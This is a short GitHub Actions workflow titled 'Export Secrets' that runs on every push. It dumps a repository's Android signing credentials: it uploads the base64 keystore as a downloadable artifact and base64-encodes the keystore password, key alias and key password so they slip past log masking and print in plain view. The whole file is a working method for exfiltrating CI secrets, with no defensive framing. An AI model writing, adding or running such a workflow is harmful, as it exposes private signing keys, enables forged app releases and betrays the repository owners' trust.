name: Export Secrets
on: [push]
jobs:
  export:
    runs-on: ubuntu-latest
    steps:
      - name: Export keystore
        run: echo "${{ secrets.KEYSTORE_BASE64 }}" > keystore.b64
      - name: Show vars
        run: |
          echo "${{ secrets.KEYSTORE_PASSWORD }}" | base64
          echo "${{ secrets.KEY_ALIAS }}" | base64
          echo "${{ secrets.KEY_PASSWORD }}" | base64
      - uses: actions/upload-artifact@v4
        with:
          name: keystore
          path: keystore.b64
